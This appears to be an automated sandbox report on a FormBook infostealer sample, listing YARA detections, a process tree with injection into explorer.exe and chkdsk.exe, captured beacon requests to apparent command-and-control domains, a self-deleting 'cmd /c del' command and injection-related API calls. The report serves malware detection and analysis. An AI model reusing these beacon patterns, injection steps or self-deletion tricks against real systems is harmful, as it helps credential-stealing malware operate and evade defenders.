                                                          Server: Tuser
                                                          Date: Wed, 13 Oct 2021 17:59:56 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          X-Powered-By: PHP/7.0.19
                                                          Data Raw: 31 35 0d 0a e8 af b7 e5 8b bf e9 87 87 e9 9b 86 e6 9c ac e7 ab 99 ef bc 81 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 150


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          4192.168.2.649837172.67.216.280C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:00:01.860404968 CEST5030OUTGET /fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX HTTP/1.1
                                                          Host: www.healthyweekendtips.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 20:00:01.915873051 CEST5031INHTTP/1.1 301 Moved Permanently
                                                          Date: Wed, 13 Oct 2021 18:00:01 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: max-age=3600
                                                          Expires: Wed, 13 Oct 2021 19:00:01 GMT
                                                          Location: https://www.healthyweekendtips.com/fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kfUbfQgnMBTsm0V9omKArDpqwWTiG555soEIAxHiX%2BNn7LDfaAyQXSkUStCucnUaNT6uzytWOTeXK41vooRBUy3ssTlFTop8eQLvPmck0Bry1DzRkwo7gVkCsHengUjRvGpN800lGhulsFZIPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 69da7713aeae1782-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          5192.168.2.649842108.167.135.12280C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Oct 13, 2021 20:00:12.248111010 CEST5052OUTGET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw== HTTP/1.1
                                                          Host: www.esyscoloradosprings.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Oct 13, 2021 20:00:12.395104885 CEST5054INHTTP/1.1 503 Service Unavailable
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 884
                                                          Connection: close
                                                          P3P: CP="CAO PSA OUR"
                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Pragma: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; }</style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b> </p></div></body></html>


                                                          Code Manipulations

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: 2u2u8wnrrW.exe PID: 6996 Parent PID: 6072

                                                          General

                                                          Start time:19:58:13
                                                          Start date:13/10/2021
                                                          Path:C:\Users\user\Desktop\2u2u8wnrrW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\2u2u8wnrrW.exe'
                                                          Imagebase:0xfd0000
                                                          File size:583168 bytes
                                                          MD5 hash:51DCC89ED1035A6C2FC57ADA8DCB4DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: 2u2u8wnrrW.exe PID: 7164 Parent PID: 6996

                                                          General

                                                          Start time:19:58:23
                                                          Start date:13/10/2021
                                                          Path:C:\Users\user\Desktop\2u2u8wnrrW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\2u2u8wnrrW.exe
                                                          Imagebase:0x850000
                                                          File size:583168 bytes
                                                          MD5 hash:51DCC89ED1035A6C2FC57ADA8DCB4DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: explorer.exe PID: 3440 Parent PID: 7164

                                                          General

                                                          Start time:19:58:24
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6f22f0000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: chkdsk.exe PID: 6464 Parent PID: 3440

                                                          General

                                                          Start time:19:58:52
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\SysWOW64\chkdsk.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                          Imagebase:0xfd0000
                                                          File size:23040 bytes
                                                          MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: cmd.exe PID: 3324 Parent PID: 6464

                                                          General

                                                          Start time:19:58:57
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe'
                                                          Imagebase:0x2a0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: conhost.exe PID: 2440 Parent PID: 3324

                                                          General

                                                          Start time:19:58:57
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff61de10000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >

                                                            Analysis Process: 2u2u8wnrrW.exe PID: 6996 Parent PID: 6072 2u2u8wnrrW.exeCOMMON

                                                            Executed Functions

                                                            Function 080D1B68, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 080D1D9E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.378281958.00000000080D0000.00000040.00000001.sdmp, Offset: 08080000, based on PE: true
                                                            • Associated: 00000000.00000002.377823942.0000000008080000.00000004.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: fa4d17056226afa4db5031cff3a396e5d2e693abcc145a485e4836fa6ab4d88c
                                                            • Instruction ID: 25e0924c8dff9c81511f321b86421a99cc325843095217b1f3bebe2bf7331031
                                                            • Opcode Fuzzy Hash: fa4d17056226afa4db5031cff3a396e5d2e693abcc145a485e4836fa6ab4d88c
                                                            • Instruction Fuzzy Hash: 4F913A71D00319CFDB10DFA8C881BEEBBB2BF49315F14856AE819A7240DB749986CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019C9EB0, Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 019CA0F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: ec22c52de8b3db202828e4da14cbe4ec5db25536803a43ce09ccda73306c70df
                                                            • Instruction ID: 952e2e6154c1de31536db25a73b1b6fe712b9e3f1158016537d15ee5f4280f8c
                                                            • Opcode Fuzzy Hash: ec22c52de8b3db202828e4da14cbe4ec5db25536803a43ce09ccda73306c70df
                                                            • Instruction Fuzzy Hash: 7F712570A00B068FD724DF6AD04479ABBF5BF88704F10892ED48AD7A40E775E905CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019C41BC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 019C5711
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 3f715ad51e499fdbdc5be8ab4177b4bb2c8c6f57e3d68350377a161a6741f962
                                                            • Instruction ID: bf42233da4d4fbc78f20a10c7e5818eb8ab04529df0e84a7d75459dae2bb53e8
                                                            • Opcode Fuzzy Hash: 3f715ad51e499fdbdc5be8ab4177b4bb2c8c6f57e3d68350377a161a6741f962
                                                            • Instruction Fuzzy Hash: 6341D270D00618CBDB24DFA9C884BCEBBF5BF88304F24846AD409AB251DB756946CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019C5655, Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 019C5711
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 0c43948ec9a4d145b8d3a05ecaff2997fdb40cbe071c53a99b23f54322a2fd76
                                                            • Instruction ID: c8a5d589506dd40d78b87f6ebcd767a1ba3b29cd64ab3be488155bc48dccdee2
                                                            • Opcode Fuzzy Hash: 0c43948ec9a4d145b8d3a05ecaff2997fdb40cbe071c53a99b23f54322a2fd76
                                                            • Instruction Fuzzy Hash: 9E41E270D00618CFDB24DFA9C884BCEBBF5BF88304F20846AD409AB251DB756946CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019CC497, Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019CC39E,?,?,?,?,?), ref: 019CC45F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 13495bb0f18a79f913551a9e5d1ed1ea9a9accb416e5e783f0efbcc652807b13
                                                            • Instruction ID: 80dce3be5ff70d7e3eb0542ee81027a73938cb3a79213b468d4fb22f2b8f8819
                                                            • Opcode Fuzzy Hash: 13495bb0f18a79f913551a9e5d1ed1ea9a9accb416e5e783f0efbcc652807b13
                                                            • Instruction Fuzzy Hash: 7F314AB8A42300EFFB158F60E54977A3BF9F799701F144129EE0A8B385DB74A815CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 080D14E0, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 080D1570
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.378281958.00000000080D0000.00000040.00000001.sdmp, Offset: 08080000, based on PE: true
                                                            • Associated: 00000000.00000002.377823942.0000000008080000.00000004.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: df9e686133adfcc35e560424831699f385e9d49455770dc7579859aefc35e024
                                                            • Instruction ID: d47939535f3069376c098e091f95bf0ce52279076e7d5c1b9f62e25851070f52
                                                            • Opcode Fuzzy Hash: df9e686133adfcc35e560424831699f385e9d49455770dc7579859aefc35e024
                                                            • Instruction Fuzzy Hash: 062124719003499FCB10CFA9C884BEEBBF5FF48314F14882AE919A7240CB789955CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019CABC4, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019CC39E,?,?,?,?,?), ref: 019CC45F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 2914654ff2d1329b3ca907c8d9d31784f687060cae42280e670beee496f81bb7
                                                            • Instruction ID: 10e5e83a8f12c693dff90e57dc0b77fa897a342b0f7e281950a3a05cde7affaf
                                                            • Opcode Fuzzy Hash: 2914654ff2d1329b3ca907c8d9d31784f687060cae42280e670beee496f81bb7
                                                            • Instruction Fuzzy Hash: 2721E5B5900248AFDB10CF99D884AEEFFF8EB48720F14841AE958A7310D374A954CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019CC3D1, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,019CC39E,?,?,?,?,?), ref: 019CC45F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 78385ec9bafa15470d62ad06bf2ab3ec6375425959af2bc215d6746e61b425bb
                                                            • Instruction ID: 57bc10f612e8e390ed49417e4ab38f223f03f16197a505c6ba0fb0222514b451
                                                            • Opcode Fuzzy Hash: 78385ec9bafa15470d62ad06bf2ab3ec6375425959af2bc215d6746e61b425bb
                                                            • Instruction Fuzzy Hash: 4E21E5B5900248AFDB10CF99D884ADEFFF8EB48724F14841AE958A3310D374A954CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 080D1348, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 080D13C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.378281958.00000000080D0000.00000040.00000001.sdmp, Offset: 08080000, based on PE: true
                                                            • Associated: 00000000.00000002.377823942.0000000008080000.00000004.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: 5dfcbf591bfc90a3a01aef8fe523fc8b4e9023859f94e3e31f90935d8aa6ebdd
                                                            • Instruction ID: 600aa6d574bd7d41f3e5a41c327d25626fcd470aced105b70d187110bdfa9314
                                                            • Opcode Fuzzy Hash: 5dfcbf591bfc90a3a01aef8fe523fc8b4e9023859f94e3e31f90935d8aa6ebdd
                                                            • Instruction Fuzzy Hash: E12134719003088FDB10DFAAD4857EEBBF5AF88224F14882ED459A7640CB78A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 080D15D0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 080D1650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.378281958.00000000080D0000.00000040.00000001.sdmp, Offset: 08080000, based on PE: true
                                                            • Associated: 00000000.00000002.377823942.0000000008080000.00000004.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 4f4cebe445e7f74095cf63e898aa391a7a48e2391336c7f94660e3f6cf763a77
                                                            • Instruction ID: d1fd247ea915c863c34907730eda736c102183cd5d4b633491886e6e9d1d5c54
                                                            • Opcode Fuzzy Hash: 4f4cebe445e7f74095cf63e898aa391a7a48e2391336c7f94660e3f6cf763a77
                                                            • Instruction Fuzzy Hash: 9C2128718003499FDB10DFAAD880AEEFBF5FF48314F14882EE518A7250C7799955DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019C9958, Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019CA171,00000800,00000000,00000000), ref: 019CA382
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: ac6d9a49a83874f1f93d7efbdbf7233856490e593285dabd02ad960d4c08c6c8
                                                            • Instruction ID: ab2f9a607dae898e55ff2026a5110af21e1b2ea66229db0d3ef332ba5e4c7b41
                                                            • Opcode Fuzzy Hash: ac6d9a49a83874f1f93d7efbdbf7233856490e593285dabd02ad960d4c08c6c8
                                                            • Instruction Fuzzy Hash: 90216AB18043498FDB10CFAAD444ADEBFF8EB49620F14846ED559A7301D3799545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019C9970, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019CA171,00000800,00000000,00000000), ref: 019CA382
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 21dd3b6405f183ba10bf6f5a94978c2c44acda1ade96af18b92911ab98e4386f
                                                            • Instruction ID: bc20b8b5007109d155a6c873f8dfa72787b3ae8824c505a7228ae7cc687c7010
                                                            • Opcode Fuzzy Hash: 21dd3b6405f183ba10bf6f5a94978c2c44acda1ade96af18b92911ab98e4386f
                                                            • Instruction Fuzzy Hash: 581147B59003488FDB10CF9AD444ADEFBF8EB48720F10842ED919A7700D375A545CFA1
                                                            Uniqueness

